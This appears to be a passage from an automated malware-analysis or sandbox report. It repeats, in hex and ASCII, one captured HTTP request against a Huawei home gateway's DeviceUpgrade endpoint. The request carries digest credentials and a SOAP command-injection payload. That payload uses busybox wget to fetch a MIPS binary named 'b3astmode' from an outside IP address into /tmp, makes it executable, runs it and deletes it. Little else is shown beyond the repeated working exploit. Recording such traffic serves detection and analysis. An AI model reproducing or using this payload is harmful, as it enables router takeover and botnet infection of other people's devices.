-g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 